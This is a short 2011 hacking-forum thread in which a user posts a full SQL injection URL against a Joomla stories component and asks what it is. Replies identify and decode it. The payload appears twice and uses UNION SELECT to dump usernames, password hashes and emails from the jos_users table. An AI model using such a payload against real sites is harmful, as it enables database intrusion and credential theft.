Author Topic: what kind of injection is this? (Read 1688 times)

chernabog · « **on:** September 02, 2011, 04:27:05 am »

i really know what kind of injection is this i cant find in net kinda this epic :!!!

http://www.evilzone.com/index.php?Itemid=70&option=com_m4f_stories&view=story&id=11976%20and%201=2%20union%20select%200,unhex%28hex%28concat%280x5e5e5e,group_concat%28username,0x5e,password2,0x5e,email%29,0x5e5e5e%29%29%29,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20%28select%20*%20from%20%28select%20*%20from%20jos_users%20where%20password2!=0x6531306164633339343962613539616262653536653035376632306638383365%20order%20by%201%20limit%20139590,10%29t%20order%20by%201%20desc%29t--

ca0s · « **Reply #1 on:** September 02, 2011, 09:56:53 am »

SQL injection.

Stackprotector · « **Reply #2 on:** September 02, 2011, 12:42:00 pm »

Code: [Select]

http://www.evilzone.com/index.php?Itemid=70&option=com_m4f_stories&view=story&id=11976 and 1=2 union select 0,unhex(hex(concat(0x5e5e5e,group_concat(username,0x5e,password2,0x5e,email),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from (select * from (select * from jos_users where password2!=0x6531306164633339343962613539616262653536653035376632306638383365 order by 1 limit 139590,10)t order by 1 desc)t--

It was url decoded, mostly used for some filter bypassing an just to deliver a good syntax, ?Itemid=70&option=com_m4f_stories&view=story&id=11976 are the url parameters, and the rest is the sql injection, what it does, it breaks the original mysql query by using AND 1=2, that always returns false. so the query fails, and u can start taking over the old query by the union select statement.

chernabog · « **Reply #3 on:** September 02, 2011, 04:46:29 pm »

Thanx Tooo Much mate!!

EvilZone

News:

Author Topic: what kind of injection is this? (Read 1688 times)

chernabog

what kind of injection is this?

ca0s

Re: what kind of injection is this?

Stackprotector

Re: what kind of injection is this?

chernabog

Re: what kind of injection is this?